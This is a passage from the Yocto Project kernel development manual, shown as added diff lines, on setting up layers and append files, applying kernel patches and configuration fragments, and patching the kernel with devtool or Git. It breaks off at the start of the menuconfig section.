+ :yocto_wiki:`TipsAndTricks/KernelDevelopmentWithEsdk </wiki/TipsAndTricks/KernelDevelopmentWithEsdk>`
+ Wiki page.
+
+At this point you have set up to start making modifications to the
+kernel by using the extensible SDK. For a continued example, see the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+section.
+
+Getting Ready for Traditional Kernel Development
+------------------------------------------------
+
+Getting ready for traditional kernel development using the Yocto Project
+involves many of the same steps as described in the previous section.
+However, you need to establish a local copy of the kernel source since
+you will be editing these files.
+
+Follow these steps to prepare to update the kernel image using
+traditional kernel development flow with the Yocto Project. Completing
+this procedure leaves you ready to make modifications to the kernel
+source as described in the ":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+section:
+
+1. *Initialize the BitBake Environment:* Before you can do anything
+ using BitBake, you need to initialize the BitBake build environment
+ by sourcing the build environment script (i.e.
+ :ref:`structure-core-script`).
+ Also, for this example, be sure that the local branch you have
+ checked out for ``poky`` is the Yocto Project &DISTRO_NAME; branch. If
+ you need to checkout out the &DISTRO_NAME; branch, see the
+ ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`"
+ section in the Yocto Project Development Tasks Manual.
+ ::
+
+ $ cd ~/poky
+ $ git branch
+ master
+ * &DISTRO_NAME_NO_CAP;
+ $ source oe-init-build-env
+
+ .. note::
+
+ The previous commands assume the
+ :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+ (i.e. ``poky``) have been cloned using Git and the local repository is named
+ "poky".
+
+2. *Prepare Your local.conf File:* By default, the
+ :term:`MACHINE` variable is set to
+ "qemux86-64", which is fine if you are building for the QEMU emulator
+ in 64-bit mode. However, if you are not, you need to set the
+ ``MACHINE`` variable appropriately in your ``conf/local.conf`` file
+ found in the
+ :term:`Build Directory` (i.e.
+ ``~/poky/build`` in this example).
+
+ Also, since you are preparing to work on the kernel image, you need
+ to set the
+ :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+ variable to include kernel modules.
+
+ In this example we wish to build for qemux86 so we must set the
+ ``MACHINE`` variable to "qemux86" and also add the "kernel-modules".
+ As described we do this by appending to ``conf/local.conf``:
+ ::
+
+ MACHINE = "qemux86"
+ MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
+
+3. *Create a Layer for Patches:* You need to create a layer to hold
+ patches created for the kernel image. You can use the
+ ``bitbake-layers create-layer`` command as follows:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake-layers create-layer ../../meta-mylayer
+ NOTE: Starting bitbake server...
+ Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
+
+ .. note::
+
+ For background information on working with common and BSP layers,
+ see the
+ ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+ section in the Yocto Project Development Tasks Manual and the
+ ":ref:`bsp-guide/bsp:bsp layers`" section in the Yocto Project Board
+ Support (BSP) Developer's Guide, respectively. For information on how to
+ use the ``bitbake-layers create-layer`` command to quickly set up a layer,
+ see the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+ section in the Yocto Project Development Tasks Manual.
+
+4. *Inform the BitBake Build Environment About Your Layer:* As directed
+ when you created your layer, you need to add the layer to the
+ :term:`BBLAYERS` variable in the
+ ``bblayers.conf`` file as follows:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake-layers add-layer ../../meta-mylayer
+ NOTE: Starting bitbake server ...
+ $
+
+5. *Create a Local Copy of the Kernel Git Repository:* You can find Git
+ repositories of supported Yocto Project kernels organized under
+ "Yocto Linux Kernel" in the Yocto Project Source Repositories at
+ :yocto_git:`/`.
+
+ For simplicity, it is recommended that you create your copy of the
+ kernel Git repository outside of the
+ :term:`Source Directory`, which is
+ usually named ``poky``. Also, be sure you are in the
+ ``standard/base`` branch.
+
+ The following commands show how to create a local copy of the
+ ``linux-yocto-4.12`` kernel and be in the ``standard/base`` branch.
+
+ .. note::
+
+ The ``linux-yocto-4.12`` kernel can be used with the Yocto Project 2.4
+ release and forward.
+ You cannot use the ``linux-yocto-4.12`` kernel with releases prior to
+ Yocto Project 2.4.
+
+ ::
+
+ $ cd ~
+ $ git clone git://git.yoctoproject.org/linux-yocto-4.12 --branch standard/base
+ Cloning into 'linux-yocto-4.12'...
+ remote: Counting objects: 6097195, done.
+ remote: Compressing objects: 100% (901026/901026), done.
+ remote: Total 6097195 (delta 5152604), reused 6096847 (delta 5152256)
+ Receiving objects: 100% (6097195/6097195), 1.24 GiB | 7.81 MiB/s, done.
+ Resolving deltas: 100% (5152604/5152604), done. Checking connectivity... done.
+ Checking out files: 100% (59846/59846), done.
+
+6. *Create a Local Copy of the Kernel Cache Git Repository:* For
+ simplicity, it is recommended that you create your copy of the kernel
+ cache Git repository outside of the
+ :term:`Source Directory`, which is
+ usually named ``poky``. Also, for this example, be sure you are in
+ the ``yocto-4.12`` branch.
+
+ The following commands show how to create a local copy of the
+ ``yocto-kernel-cache`` and be in the ``yocto-4.12`` branch:
+ ::
+
+ $ cd ~
+ $ git clone git://git.yoctoproject.org/yocto-kernel-cache --branch yocto-4.12
+ Cloning into 'yocto-kernel-cache'...
+ remote: Counting objects: 22639, done.
+ remote: Compressing objects: 100% (9761/9761), done.
+ remote: Total 22639 (delta 12400), reused 22586 (delta 12347)
+ Receiving objects: 100% (22639/22639), 22.34 MiB | 6.27 MiB/s, done.
+ Resolving deltas: 100% (12400/12400), done.
+ Checking connectivity... done.
+
+At this point, you are ready to start making modifications to the kernel
+using traditional kernel development steps. For a continued example, see
+the "`Using Traditional Kernel Development to Patch the
+Kernel <#using-traditional-kernel-development-to-patch-the-kernel>`__"
+section.
+
+Creating and Preparing a Layer
+==============================
+
+If you are going to be modifying kernel recipes, it is recommended that
+you create and prepare your own layer in which to do your work. Your
+layer contains its own :term:`BitBake`
+append files (``.bbappend``) and provides a convenient mechanism to
+create your own recipe files (``.bb``) as well as store and use kernel
+patch files. For background information on working with layers, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual.
+
+.. note::
+
+ The Yocto Project comes with many tools that simplify tasks you need
+ to perform. One such tool is the ``bitbake-layers create-layer``
+ command, which simplifies creating a new layer. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+ section in the Yocto Project Development Tasks Manual for
+ information on how to use this script to quick set up a new layer.
+
+To better understand the layer you create for kernel development, the
+following section describes how to create a layer without the aid of
+tools. These steps assume creation of a layer named ``mylayer`` in your
+home directory:
+
+1. *Create Structure*: Create the layer's structure:
+ ::
+
+ $ cd $HOME
+ $ mkdir meta-mylayer
+ $ mkdir meta-mylayer/conf
+ $ mkdir meta-mylayer/recipes-kernel
+ $ mkdir meta-mylayer/recipes-kernel/linux
+ $ mkdir meta-mylayer/recipes-kernel/linux/linux-yocto
+
+ The ``conf`` directory holds your configuration files, while the
+ ``recipes-kernel`` directory holds your append file and eventual
+ patch files.
+
+2. *Create the Layer Configuration File*: Move to the
+ ``meta-mylayer/conf`` directory and create the ``layer.conf`` file as
+ follows:
+ ::
+
+ # We have a conf and classes directory, add to BBPATH
+ BBPATH .= ":${LAYERDIR}"
+
+ # We have recipes-* directories, add to BBFILES
+ BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+ ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+ BBFILE_COLLECTIONS += "mylayer"
+ BBFILE_PATTERN_mylayer = "^${LAYERDIR}/"
+ BBFILE_PRIORITY_mylayer = "5"
+
+ Notice ``mylayer`` as part of the last three statements.
+
+3. *Create the Kernel Recipe Append File*: Move to the
+ ``meta-mylayer/recipes-kernel/linux`` directory and create the
+ kernel's append file. This example uses the ``linux-yocto-4.12``
+ kernel. Thus, the name of the append file is
+ ``linux-yocto_4.12.bbappend``:
+ ::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+ SRC_URI_append = " file://patch-file-one.patch"
+ SRC_URI_append = " file://patch-file-two.patch"
+ SRC_URI_append = " file://patch-file-three.patch"
+
+ The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements
+ enable the OpenEmbedded build system to find patch files. For more
+ information on using append files, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+ section in the Yocto Project Development Tasks Manual.
+
+Modifying an Existing Recipe
+============================
+
+In many cases, you can customize an existing linux-yocto recipe to meet
+the needs of your project. Each release of the Yocto Project provides a
+few Linux kernel recipes from which you can choose. These are located in
+the :term:`Source Directory` in
+``meta/recipes-kernel/linux``.
+
+Modifying an existing recipe can consist of the following:
+
+- :ref:`kernel-dev/kernel-dev-common:creating the append file`
+
+- :ref:`kernel-dev/kernel-dev-common:applying patches`
+
+- :ref:`kernel-dev/kernel-dev-common:changing the configuration`
+
+Before modifying an existing recipe, be sure that you have created a
+minimal, custom layer from which you can work. See the "`Creating and
+Preparing a Layer <#creating-and-preparing-a-layer>`__" section for
+information.
+
+Creating the Append File
+------------------------
+
+You create this file in your custom layer. You also name it accordingly
+based on the linux-yocto recipe you are using. For example, if you are
+modifying the ``meta/recipes-kernel/linux/linux-yocto_4.12.bb`` recipe,
+the append file will typically be located as follows within your custom
+layer:
+
+.. code-block:: none
+
+ your-layer/recipes-kernel/linux/linux-yocto_4.12.bbappend
+
+The append file should initially extend the
+:term:`FILESPATH` search path by
+prepending the directory that contains your files to the
+:term:`FILESEXTRAPATHS`
+variable as follows:
+::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+The path ``${``\ :term:`THISDIR`\ ``}/${``\ :term:`PN`\ ``}``
+expands to "linux-yocto" in the current directory for this example. If
+you add any new files that modify the kernel recipe and you have
+extended ``FILESPATH`` as described above, you must place the files in
+your layer in the following area:
+::
+
+ your-layer/recipes-kernel/linux/linux-yocto/
+
+.. note::
+
+ If you are working on a new machine Board Support Package (BSP), be
+ sure to refer to the :doc:`../bsp-guide/bsp-guide`.
+
+As an example, consider the following append file used by the BSPs in
+``meta-yocto-bsp``:
+
+.. code-block:: none
+
+ meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend
+
+The following listing shows the file. Be aware that the actual commit ID
+strings in this example listing might be different than the actual
+strings in the file from the ``meta-yocto-bsp`` layer upstream.
+::
+
+ KBRANCH_genericx86 = "standard/base"
+ KBRANCH_genericx86-64 = "standard/base"
+
+ KMACHINE_genericx86 ?= "common-pc"
+ KMACHINE_genericx86-64 ?= "common-pc-64"
+ KBRANCH_edgerouter = "standard/edgerouter"
+ KBRANCH_beaglebone = "standard/beaglebone"
+
+ SRCREV_machine_genericx86 ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
+ SRCREV_machine_genericx86-64 ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
+ SRCREV_machine_edgerouter ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
+ SRCREV_machine_beaglebone ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
+
+
+ COMPATIBLE_MACHINE_genericx86 = "genericx86"
+ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
+ COMPATIBLE_MACHINE_edgerouter = "edgerouter"
+ COMPATIBLE_MACHINE_beaglebone = "beaglebone"
+
+ LINUX_VERSION_genericx86 = "4.12.7"
+ LINUX_VERSION_genericx86-64 = "4.12.7"
+ LINUX_VERSION_edgerouter = "4.12.10"
+ LINUX_VERSION_beaglebone = "4.12.10"
+
+This append file
+contains statements used to support several BSPs that ship with the
+Yocto Project. The file defines machines using the
+:term:`COMPATIBLE_MACHINE`
+variable and uses the
+:term:`KMACHINE` variable to ensure
+the machine name used by the OpenEmbedded build system maps to the
+machine name used by the Linux Yocto kernel. The file also uses the
+optional :term:`KBRANCH` variable to
+ensure the build process uses the appropriate kernel branch.
+
+Although this particular example does not use it, the
+:term:`KERNEL_FEATURES`
+variable could be used to enable features specific to the kernel. The
+append file points to specific commits in the
+:term:`Source Directory` Git repository and
+the ``meta`` Git repository branches to identify the exact kernel needed
+to build the BSP.
+
+One thing missing in this particular BSP, which you will typically need
+when developing a BSP, is the kernel configuration file (``.config``)
+for your BSP. When developing a BSP, you probably have a kernel
+configuration file or a set of kernel configuration files that, when
+taken together, define the kernel configuration for your BSP. You can
+accomplish this definition by putting the configurations in a file or a
+set of files inside a directory located at the same level as your
+kernel's append file and having the same name as the kernel's main
+recipe file. With all these conditions met, simply reference those files
+in the :term:`SRC_URI` statement in
+the append file.
+
+For example, suppose you had some configuration options in a file called
+``network_configs.cfg``. You can place that file inside a directory
+named ``linux-yocto`` and then add a ``SRC_URI`` statement such as the
+following to the append file. When the OpenEmbedded build system builds
+the kernel, the configuration options are picked up and applied.
+::
+
+ SRC_URI += "file://network_configs.cfg"
+
+To group related configurations into multiple files, you perform a
+similar procedure. Here is an example that groups separate
+configurations specifically for Ethernet and graphics into their own
+files and adds the configurations by using a ``SRC_URI`` statement like
+the following in your append file:
+::
+
+ SRC_URI += "file://myconfig.cfg \
+ file://eth.cfg \
+ file://gfx.cfg"
+
+Another variable you can use in your kernel recipe append file is the
+:term:`FILESEXTRAPATHS`
+variable. When you use this statement, you are extending the locations
+used by the OpenEmbedded system to look for files and patches as the
+recipe is processed.
+
+.. note::
+
+ Other methods exist to accomplish grouping and defining configuration
+ options. For example, if you are working with a local clone of the
+ kernel repository, you could checkout the kernel's ``meta`` branch,
+ make your changes, and then push the changes to the local bare clone
+ of the kernel. The result is that you directly add configuration
+ options to the ``meta`` branch for your BSP. The configuration
+ options will likely end up in that location anyway if the BSP gets
+ added to the Yocto Project.
+
+ In general, however, the Yocto Project maintainers take care of
+ moving the ``SRC_URI``-specified configuration options to the
+ kernel's ``meta`` branch. Not only is it easier for BSP developers to
+ not have to worry about putting those configurations in the branch,
+ but having the maintainers do it allows them to apply 'global'
+ knowledge about the kinds of common configuration options multiple
+ BSPs in the tree are typically using. This allows for promotion of
+ common configurations into common features.
+
+Applying Patches
+----------------
+
+If you have a single patch or a small series of patches that you want to
+apply to the Linux kernel source, you can do so just as you would with
+any other recipe. You first copy the patches to the path added to
+:term:`FILESEXTRAPATHS` in
+your ``.bbappend`` file as described in the previous section, and then
+reference them in :term:`SRC_URI`
+statements.
+
+For example, you can apply a three-patch series by adding the following
+lines to your linux-yocto ``.bbappend`` file in your layer:
+::
+
+ SRC_URI += "file://0001-first-change.patch"
+ SRC_URI += "file://0002-second-change.patch"
+ SRC_URI += "file://0003-third-change.patch"
+
+The next time you run BitBake to build
+the Linux kernel, BitBake detects the change in the recipe and fetches
+and applies the patches before building the kernel.
+
+For a detailed example showing how to patch the kernel using
+``devtool``, see the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+and
+":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+sections.
+
+Changing the Configuration
+--------------------------
+
+You can make wholesale or incremental changes to the final ``.config``
+file used for the eventual Linux kernel configuration by including a
+``defconfig`` file and by specifying configuration fragments in the
+:term:`SRC_URI` to be applied to that
+file.
+
+If you have a complete, working Linux kernel ``.config`` file you want
+to use for the configuration, as before, copy that file to the
+appropriate ``${PN}`` directory in your layer's ``recipes-kernel/linux``
+directory, and rename the copied file to "defconfig". Then, add the
+following lines to the linux-yocto ``.bbappend`` file in your layer:
+::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+ SRC_URI += "file://defconfig"
+
+The ``SRC_URI`` tells the build system how to search
+for the file, while the
+:term:`FILESEXTRAPATHS`
+extends the :term:`FILESPATH`
+variable (search directories) to include the ``${PN}`` directory you
+created to hold the configuration changes.
+
+.. note::
+
+ The build system applies the configurations from the ``defconfig``
+ file before applying any subsequent configuration fragments. The
+ final kernel configuration is a combination of the configurations in
+ the ``defconfig`` file and any configuration fragments you provide. You need
+ to realize that if you have any configuration fragments, the build system
+ applies these on top of and after applying the existing ``defconfig`` file
+ configurations.
+
+Generally speaking, the preferred approach is to determine the
+incremental change you want to make and add that as a configuration
+fragment. For example, if you want to add support for a basic serial
+console, create a file named ``8250.cfg`` in the ``${PN}`` directory
+with the following content (without indentation):
+::
+
+ CONFIG_SERIAL_8250=y
+ CONFIG_SERIAL_8250_CONSOLE=y
+ CONFIG_SERIAL_8250_PCI=y
+ CONFIG_SERIAL_8250_NR_UARTS=4
+ CONFIG_SERIAL_8250_RUNTIME_UARTS=4
+ CONFIG_SERIAL_CORE=y
+ CONFIG_SERIAL_CORE_CONSOLE=y
+
+Next, include this
+configuration fragment and extend the ``FILESPATH`` variable in your
+``.bbappend`` file:
+::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+ SRC_URI += "file://8250.cfg"
+
+The next time you run BitBake to build the
+Linux kernel, BitBake detects the change in the recipe and fetches and
+applies the new configuration before building the kernel.
+
+For a detailed example showing how to configure the kernel, see the
+"`Configuring the Kernel <#configuring-the-kernel>`__" section.
+
+Using an "In-Tree"  ``defconfig`` File
+--------------------------------------
+
+It might be desirable to have kernel configuration fragment support
+through a ``defconfig`` file that is pulled from the kernel source tree
+for the configured machine. By default, the OpenEmbedded build system
+looks for ``defconfig`` files in the layer used for Metadata, which is
+"out-of-tree", and then configures them using the following:
+::
+
+ SRC_URI += "file://defconfig"
+
+If you do not want to maintain copies of
+``defconfig`` files in your layer but would rather allow users to use
+the default configuration from the kernel tree and still be able to add
+configuration fragments to the
+:term:`SRC_URI` through, for example,
+append files, you can direct the OpenEmbedded build system to use a
+``defconfig`` file that is "in-tree".
+
+To specify an "in-tree" ``defconfig`` file, use the following statement
+form:
+::
+
+ KBUILD_DEFCONFIG_KMACHINE ?= "defconfig_file"
+
+Here is an example
+that assigns the ``KBUILD_DEFCONFIG`` variable based on "raspberrypi2"
+and provides the path to the "in-tree" ``defconfig`` file to be used for
+a Raspberry Pi 2, which is based on the Broadcom 2708/2709 chipset:
+::
+
+ KBUILD_DEFCONFIG_raspberrypi2 ?= "bcm2709_defconfig"
+
+Aside from modifying your kernel recipe and providing your own
+``defconfig`` file, you need to be sure no files or statements set
+``SRC_URI`` to use a ``defconfig`` other than your "in-tree" file (e.g.
+a kernel's ``linux-``\ `machine`\ ``.inc`` file). In other words, if the
+build system detects a statement that identifies an "out-of-tree"
+``defconfig`` file, that statement will override your
+``KBUILD_DEFCONFIG`` variable.
+
+See the
+:term:`KBUILD_DEFCONFIG`
+variable description for more information.
+
+Using ``devtool`` to Patch the Kernel
+=====================================
+
+The steps in this procedure show you how you can patch the kernel using
+the extensible SDK and ``devtool``.
+
+.. note::
+
+ Before attempting this procedure, be sure you have performed the
+ steps to get ready for updating the kernel as described in the
+ ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+ section.
+
+Patching the kernel involves changing or adding configurations to an
+existing kernel, changing or adding recipes to the kernel that are
+needed to support specific hardware features, or even altering the
+source code itself.
+
+This example creates a simple patch by adding some QEMU emulator console
+output at boot time through ``printk`` statements in the kernel's
+``calibrate.c`` source code file. Applying the patch and booting the
+modified image causes the added messages to appear on the emulator's
+console. The example is a continuation of the setup procedure found in
+the ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``" Section.
+
+1. *Check Out the Kernel Source Files:* First you must use ``devtool``
+ to checkout the kernel source code in its workspace. Be sure you are
+ in the terminal set up to do work with the extensible SDK.
+
+ .. note::
+
+ See this step in the
+ ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+ section for more information.
+
+ Use the following ``devtool`` command to check out the code:
+ ::
+
+ $ devtool modify linux-yocto
+
+ .. note::
+
+ During the checkout operation, a bug exists that could cause
+ errors such as the following to appear:
+
+ .. code-block:: none
+
+ ERROR: Taskhash mismatch 2c793438c2d9f8c3681fd5f7bc819efa versus
+ be3a89ce7c47178880ba7bf6293d7404 for
+ /path/to/esdk/layers/poky/meta/recipes-kernel/linux/linux-yocto_4.10.bb.do_unpack
+
+
+ You can safely ignore these messages. The source code is correctly
+ checked out.
+
+2. *Edit the Source Files* Follow these steps to make some simple
+ changes to the source files:
+
+ 1. *Change the working directory*: In the previous step, the output
+ noted where you can find the source files (e.g.
+ ``~/poky_sdk/workspace/sources/linux-yocto``). Change to where the
+ kernel source code is before making your edits to the
+ ``calibrate.c`` file:
+ ::
+
+ $ cd ~/poky_sdk/workspace/sources/linux-yocto
+
+ 2. *Edit the source file*: Edit the ``init/calibrate.c`` file to have
+ the following changes:
+ ::
+
+ void calibrate_delay(void)
+ {
+ unsigned long lpj;
+ static bool printed;
+ int this_cpu = smp_processor_id();
+
+ printk("*************************************\n");
+ printk("* *\n");
+ printk("* HELLO YOCTO KERNEL *\n");
+ printk("* *\n");
+ printk("*************************************\n");
+
+ if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
+ .
+ .
+ .
+
+3. *Build the Updated Kernel Source:* To build the updated kernel
+ source, use ``devtool``:
+ ::
+
+ $ devtool build linux-yocto
+
+4. *Create the Image With the New Kernel:* Use the
+ ``devtool build-image`` command to create a new image that has the
+ new kernel.
+
+ .. note::
+
+ If the image you originally created resulted in a Wic file, you
+ can use an alternate method to create the new image with the
+ updated kernel. For an example, see the steps in the
+ :yocto_wiki:`TipsAndTricks/KernelDevelopmentWithEsdk </wiki/TipsAndTricks/KernelDevelopmentWithEsdk>`
+ Wiki Page.
+
+ ::
+
+ $ cd ~
+ $ devtool build-image core-image-minimal
+
+5. *Test the New Image:* For this example, you can run the new image
+ using QEMU to verify your changes:
+
+ 1. *Boot the image*: Boot the modified image in the QEMU emulator
+ using this command:
+ ::
+
+ $ runqemu qemux86
+
+ 2. *Verify the changes*: Log into the machine using ``root`` with no
+ password and then use the following shell command to scroll
+ through the console's boot output.
+
+ .. code-block:: none
+
+ # dmesg | less
+
+ You should see
+ the results of your ``printk`` statements as part of the output
+ when you scroll down the console window.
+
+6. *Stage and commit your changes*: Within your eSDK terminal, change
+ your working directory to where you modified the ``calibrate.c`` file
+ and use these Git commands to stage and commit your changes:
+ ::
+
+ $ cd ~/poky_sdk/workspace/sources/linux-yocto
+ $ git status
+ $ git add init/calibrate.c
+ $ git commit -m "calibrate: Add printk example"
+
+7. *Export the Patches and Create an Append File:* To export your
+ commits as patches and create a ``.bbappend`` file, use the following
+ command in the terminal used to work with the extensible SDK. This
+ example uses the previously established layer named ``meta-mylayer``.
+ ::
+
+ $ devtool finish linux-yocto ~/meta-mylayer
+
+ .. note::
+
+ See Step 3 of the
+ ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+ section for information on setting up this layer.
+
+ Once the command
+ finishes, the patches and the ``.bbappend`` file are located in the
+ ``~/meta-mylayer/recipes-kernel/linux`` directory.
+
+8. *Build the Image With Your Modified Kernel:* You can now build an
+ image that includes your kernel patches. Execute the following
+ command from your
+ :term:`Build Directory` in the terminal
+ set up to run BitBake:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake core-image-minimal
+
+Using Traditional Kernel Development to Patch the Kernel
+========================================================
+
+The steps in this procedure show you how you can patch the kernel using
+traditional kernel development (i.e. not using ``devtool`` and the
+extensible SDK as described in the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+section).
+
+.. note::
+
+ Before attempting this procedure, be sure you have performed the
+ steps to get ready for updating the kernel as described in the
+ ":ref:`kernel-dev/kernel-dev-common:getting ready for traditional kernel development`"
+ section.
+
+Patching the kernel involves changing or adding configurations to an
+existing kernel, changing or adding recipes to the kernel that are
+needed to support specific hardware features, or even altering the
+source code itself.
+
+The example in this section creates a simple patch by adding some QEMU
+emulator console output at boot time through ``printk`` statements in
+the kernel's ``calibrate.c`` source code file. Applying the patch and
+booting the modified image causes the added messages to appear on the
+emulator's console. The example is a continuation of the setup procedure
+found in the "`Getting Ready for Traditional Kernel
+Development <#getting-ready-for-traditional-kernel-development>`__"
+Section.
+
+1. *Edit the Source Files* Prior to this step, you should have used Git
+ to create a local copy of the repository for your kernel. Assuming
+ you created the repository as directed in the "`Getting Ready for
+ Traditional Kernel
+ Development <#getting-ready-for-traditional-kernel-development>`__"
+ section, use the following commands to edit the ``calibrate.c`` file:
+
+ 1. *Change the working directory*: You need to locate the source
+ files in the local copy of the kernel Git repository. Change to
+ where the kernel source code is before making your edits to the
+ ``calibrate.c`` file:
+ ::
+
+ $ cd ~/linux-yocto-4.12/init
+
+ 2. *Edit the source file*: Edit the ``calibrate.c`` file to have the
+ following changes:
+ ::
+
+ void calibrate_delay(void)
+ {
+ unsigned long lpj;
+ static bool printed;
+ int this_cpu = smp_processor_id();
+
+ printk("*************************************\n");
+ printk("* *\n");
+ printk("* HELLO YOCTO KERNEL *\n");
+ printk("* *\n");
+ printk("*************************************\n");
+
+ if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
+ .
+ .
+ .
+
+2. *Stage and Commit Your Changes:* Use standard Git commands to stage
+ and commit the changes you just made:
+ ::
+
+ $ git add calibrate.c
+ $ git commit -m "calibrate.c - Added some printk statements"
+
+ If you do not
+ stage and commit your changes, the OpenEmbedded Build System will not
+ pick up the changes.
+
+3. *Update Your local.conf File to Point to Your Source Files:* In
+ addition to your ``local.conf`` file specifying to use
+ "kernel-modules" and the "qemux86" machine, it must also point to the
+ updated kernel source files. Add
+ :term:`SRC_URI` and
+ :term:`SRCREV` statements similar
+ to the following to your ``local.conf``:
+ ::
+
+ $ cd ~/poky/build/conf
+
+ Add the following to the ``local.conf``:
+ ::
+
+ SRC_URI_pn-linux-yocto = "git:///path-to/linux-yocto-4.12;protocol=file;name=machine;branch=standard/base; \
+ git:///path-to/yocto-kernel-cache;protocol=file;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
+ SRCREV_meta_qemux86 = "${AUTOREV}"
+ SRCREV_machine_qemux86 = "${AUTOREV}"
+
+ .. note::
+
+ Be sure to replace `path-to`
+ with the pathname to your local Git repositories. Also, you must
+ be sure to specify the correct branch and machine types. For this
+ example, the branch is ``standard/base`` and the machine is ``qemux86``.
+
+4. *Build the Image:* With the source modified, your changes staged and
+ committed, and the ``local.conf`` file pointing to the kernel files,
+ you can now use BitBake to build the image:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake core-image-minimal
+
+5. *Boot the image*: Boot the modified image in the QEMU emulator using
+ this command. When prompted to login to the QEMU console, use "root"
+ with no password:
+ ::
+
+ $ cd ~/poky/build
+ $ runqemu qemux86
+
+6. *Look for Your Changes:* As QEMU booted, you might have seen your
+ changes rapidly scroll by. If not, use these commands to see your
+ changes:
+
+ .. code-block:: none
+
+ # dmesg | less
+
+ You should see the results of your
+ ``printk`` statements as part of the output when you scroll down the
+ console window.
+
+7. *Generate the Patch File:* Once you are sure that your patch works
+ correctly, you can generate a ``*.patch`` file in the kernel source
+ repository:
+ ::
+
+ $ cd ~/linux-yocto-4.12/init
+ $ git format-patch -1
+ 0001-calibrate.c-Added-some-printk-statements.patch
+
+8. *Move the Patch File to Your Layer:* In order for subsequent builds
+ to pick up patches, you need to move the patch file you created in
+ the previous step to your layer ``meta-mylayer``. For this example,
+ the layer created earlier is located in your home directory as
+ ``meta-mylayer``. When the layer was created using the
+ ``yocto-create`` script, no additional hierarchy was created to
+ support patches. Before moving the patch file, you need to add
+ additional structure to your layer using the following commands:
+ ::
+
+ $ cd ~/meta-mylayer
+ $ mkdir recipes-kernel
+ $ mkdir recipes-kernel/linux
+ $ mkdir recipes-kernel/linux/linux-yocto
+
+ Once you have created this
+ hierarchy in your layer, you can move the patch file using the
+ following command:
+ ::
+
+ $ mv ~/linux-yocto-4.12/init/0001-calibrate.c-Added-some-printk-statements.patch ~/meta-mylayer/recipes-kernel/linux/linux-yocto
+
+9. *Create the Append File:* Finally, you need to create the
+ ``linux-yocto_4.12.bbappend`` file and insert statements that allow
+ the OpenEmbedded build system to find the patch. The append file
+ needs to be in your layer's ``recipes-kernel/linux`` directory and it
+ must be named ``linux-yocto_4.12.bbappend`` and have the following
+ contents:
+ ::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+ SRC_URI_append = " file://0001-calibrate.c-Added-some-printk-statements.patch"
+
+ The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements
+ enable the OpenEmbedded build system to find the patch file.
+
+ For more information on append files and patches, see the "`Creating
+ the Append File <#creating-the-append-file>`__" and "`Applying
+ Patches <#applying-patches>`__" sections. You can also see the
+ ":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+ section in the Yocto Project Development Tasks Manual.
+
+ .. note::
+
+ To build ``core-image-minimal`` again and see the effects of your patch,
+ you can essentially eliminate the temporary source files saved in
+ ``poky/build/tmp/work/...`` and residual effects of the build by entering
+ the following sequence of commands:
+ ::
+
+ $ cd ~/poky/build
+ $ bitbake -c cleanall yocto-linux
+ $ bitbake core-image-minimal -c cleanall
+ $ bitbake core-image-minimal
+ $ runqemu qemux86
+
+
+Configuring the Kernel
+======================
+
+Configuring the Yocto Project kernel consists of making sure the
+``.config`` file has all the right information in it for the image you
+are building. You can use the ``menuconfig`` tool and configuration
+fragments to make sure your ``.config`` file is just how you need it.
+You can also save known configurations in a ``defconfig`` file that the
+build system can use for kernel configuration.
+
+This section describes how to use ``menuconfig``, create and use
+configuration fragments, and how to interactively modify your
+``.config`` file to create the leanest kernel configuration file
+possible.
+
+For more information on kernel configuration, see the "`Changing the
+Configuration <#changing-the-configuration>`__" section.
+
+Using  ``menuconfig``
+---------------------
+
+The easiest way to define kernel configurations is to set them through
+the ``menuconfig`` tool. This tool provides an interactive method with
+which to set kernel configurations. For general information on
